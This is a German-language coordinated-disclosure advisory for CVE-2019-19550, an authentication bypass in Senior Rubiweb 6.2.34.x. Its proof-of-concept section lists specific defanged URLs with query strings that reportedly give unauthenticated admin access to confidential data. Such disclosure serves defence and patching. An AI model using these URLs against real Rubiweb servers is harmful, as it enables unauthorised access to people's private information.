CVE-2019-19550
[Beschreibung]
Die Umgehung der Remote-Authentifizierung in Senior Rubiweb 6.2.34.28 und 6.2.34.37 ermöglicht Admin-Zugriff auf vertrauliche Informationen betroffener Benutzer, die anfällige Versionen verwenden. Der Angreifer muss lediglich die korrekte URL angeben.
[Wichtige Daten]
- Ankündigung (an den Anbieter): 2019-12-02
- Datum der öffentlichen Offenlegung: 2020-01-30
[Schwachstellentyp]
Fehlerhafte Zugriffskontrolle
[Produktanbieter]
Senior
[Betroffene Produktcodebasis]
- Rubiweb - 6.2.34.37
- Rubiweb - 6.2.34.28
- Andere Versionen können betroffen sein, insbesondere aus derselben Familie (noch nicht getestet)
[Betroffene Komponente]
Rubiweb
[Angriffsart]
Remote
Ja
[Angriffsvektoren]
Der Zugriff auf vertrauliche Informationen ist ohne besondere Anforderungen öffentlich verfügbar (nur der korrekte URI)
[Hat der Anbieter die Schwachstelle bestätigt oder anerkannt?]
Ja
[PoC - Proof of Concept]
- Versuchen Sie einfach, sich mit dem authentifizierten Portal zu verbinden, um die Existenz und Version des betroffenen Produkts zu bestätigen:
- hXXp://subdomain.customer.tld:8080/rubiweb/
- Rufen Sie die anfällige Seite auf (Admin ohne Authentifizierung):
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU
[Entdecker]
Mauricio Santos (R&D UnderProtection) und Hesron Hori (R&D UnderProtection)
[Dank an]
Senior – Information-Security-Team des Anbieters, das an einer koordinierten Offenlegung mitgewirkt hat
[Referenz]